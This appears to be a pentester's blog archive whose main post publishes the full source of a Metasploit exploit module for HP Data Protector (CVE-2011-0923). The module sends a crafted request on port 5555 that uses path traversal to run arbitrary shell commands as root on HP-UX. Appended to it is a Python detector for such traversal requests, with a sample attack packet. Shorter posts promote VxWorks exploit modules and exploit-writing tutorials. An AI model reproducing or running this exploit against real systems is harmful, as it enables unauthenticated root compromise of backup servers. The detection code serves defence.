This is a quick post on a vuln we (ch0ks and I) identified and exploited on an HP-UX system during a pentest. The vuln had already been reported on the ZDI site and had a working PoC on SecurityFocus. The thing is, though, that the working exploit only worked for Windows servers and workstations. After some analysis by ch0ks and me during the pentest we figured out a way to execute commands on the HP-UX server with a modified version of the payload included in the PoC. The full explanation of how we did this can be found in Adrian Puente's (ch0ks) blog, hackarandas.
The Metasploit module that I developed using this analysis has already been submitted to the team and hopefully they will include it. Just to show you guys that I am not full of it, I have included some screenshots of the execution of the module.
Module options:
Example of the working exploit running a simple command on the HP-UX (/usr/bin/id):
gr33tz to ch0ks, etlow.
c4an.
Exploit code:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Data Protector Remote Command Execution',
      'Description'    => %q{
        This exploit abuses a vulnerability in the HP Data
        Protector service. This flaw allows an unauthenticated
        attacker to execute arbitrary commands with the privileges
        of the root user.
      },
      'Author'         => [ 'c4an', 'ch0ks' ],
      'Version'        => '$Revision: 10561 $',
      'References'     =>
        [
          [ 'CVE', '2011-0923' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/' ],
          [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html' ],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
        ],
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 10000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic',
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'June 26 2011'
    ))

    register_options(
      [
        Opt::RPORT(5555),
      ], self.class)
  end

  def exploit
    print_status("Sending our command...")

    # Send the job request with the encoded command
    shell_mio = "usr/bin/sh"   # appended right after the "../" prefix below, hence no leading slash
    salto     = "\n"           # newline terminates the command line
    s         = salto.encode

    # Fixed request header and field values taken from the original PoC
    # (message type, host/user names and counters), ending in the
    # "../../" prefix that the shell path gets appended to
    shellcode = "\x00\x00\x00\xa4\x20\x32\x00\x20\x63\x34\x61\x6e\x63\x34\x61\x6e" +
      "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x63\x34\x61\x6e" +
      "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20\x63\x34" +
      "\x61\x6e\x20\x20\x20\x20\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41" +
      "\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48" +
      "\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49" +
      "\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" +
      "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" +
      "\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"

    # Shell path, NUL padding, then the payload command and a newline
    shell = shell_mio +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      payload.encode + s

    sploit = shellcode + shell

    begin
      connect
      sock.put(sploit)
      res = sock.get
      print_status(res.to_s)
      handler
    rescue
      print_status("Error in connection or socket")
    end
  end
end
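From the detection side, here is an added example (not code from the post or from the Metasploit module) that parses client requests to the omniinet listener on TCP/5555 using the field layout visible in the exploit bytes above and flags a command field that walks out of the service's bin directory with ".." components. The framing (4-byte big-endian length, then fields written as " value\x00") and the sample captures are inferred from the module's bytes and constructed here, not taken from vendor documentation.

```python
"""Added example (not the original post's or the module's code): parse
omniinet (TCP/5555) client requests using the field layout visible in the
exploit bytes above and flag a command field that walks out of the bin
directory with '..' components.  Framing is inferred from the module, not
from vendor documentation."""
import struct
from typing import Dict, List, Tuple


def parse_omniinet_request(data: bytes) -> Tuple[int, List[str]]:
    """Split one request into (declared_length, fields).

    The 4-byte big-endian length prefix is reported but not trusted: the
    module's own header value does not match its body size.  Fields are
    written as ' value\\x00'; trailing NUL padding and the shell payload
    after the command field do not start with a space and are skipped."""
    if len(data) < 4:
        raise ValueError("truncated header")
    declared = struct.unpack(">I", data[:4])[0]
    fields = [chunk[1:].decode("latin-1")
              for chunk in data[4:].split(b"\x00") if chunk.startswith(b" ")]
    return declared, fields


def has_traversal(field: str) -> bool:
    """True when a field contains a '..' path component."""
    return ".." in field.replace("\\", "/").split("/")


def classify(data: bytes) -> Dict[str, object]:
    """One-line summary of a request for a SIEM or IDS post-processor."""
    declared, fields = parse_omniinet_request(data)
    hits = [f for f in fields if has_traversal(f)]
    return {"declared_len": declared, "msg_type": fields[0] if fields else None,
            "field_count": len(fields), "traversal": bool(hits),
            "hit": hits[0] if hits else None}


# Constructed samples, not real captures.  BENIGN stays inside the bin
# directory; TRAVERSAL mirrors the command field used by the module above.
BENIGN = b"\x00\x00\x00\x20 2\x00 host1\x00 0\x00 SYSTEM\x00 bin/example_cmd\x00"
TRAVERSAL = (b"\x00\x00\x00\xa4 2\x00 host1\x00 0\x00 SYSTEM\x00"
             b" ../../../../../../../../../../usr/bin/sh" + b"\x00" * 16 + b"id\n")

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("traversal", TRAVERSAL)):
        print(name, classify(pkt))
```

Pointing this at a packet capture of port 5555 traffic gives you a quick triage of which requests ever carried a traversal, independent of whether the declared length looks sane.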
Thursday, August 4, 2011
Monday, November 15, 2010
VxWorks - Open can of worms...
I am not sure why I forgot to publish some comments about this before. Probably because I was busy with other things at the time. Anyway, as a lot of you guys might already know, HD Moore gave a presentation at Defcon about the VxWorks operating system and some security vulnerabilities that he identified during his investigation of a number of devices that use this operating system. A lot of the details have already been published by HD on the Metasploit blog. However, I would like to add: people, if you have not tested or used these modules on your pentests I will just say: DO IT!!
I remember one of the things that HD Moore mentioned when starting his presentation at Defcon was: "Have you ever seen some high weird ports on your pentests and just because you did not know what the service was about you moved on to the next service, well.."... I mean it was something like that. Well, I remember having at least two pentests where I saw some of these VxWorks ports and did not pay a lot of attention after playing with them a little bit. Shame on me... UDP port 17185 does not ring a bell, but after you read the info on the Metasploit blog it will.
Well, I just wanted to throw this out there, and since all the info is already posted I will not waste your time any more.
Happy hacking.
c4an.
Monday, January 25, 2010
Exploit writing tutorial! (link to a great blog)
I just want to add, for all the people who are starting with the whole exploitation thing, that this is an incredible set of tutorials that will blow your mind.
You will find links to the other tutorials at the end of each article.
Well here is the link in case someone is interested:
Enjoy!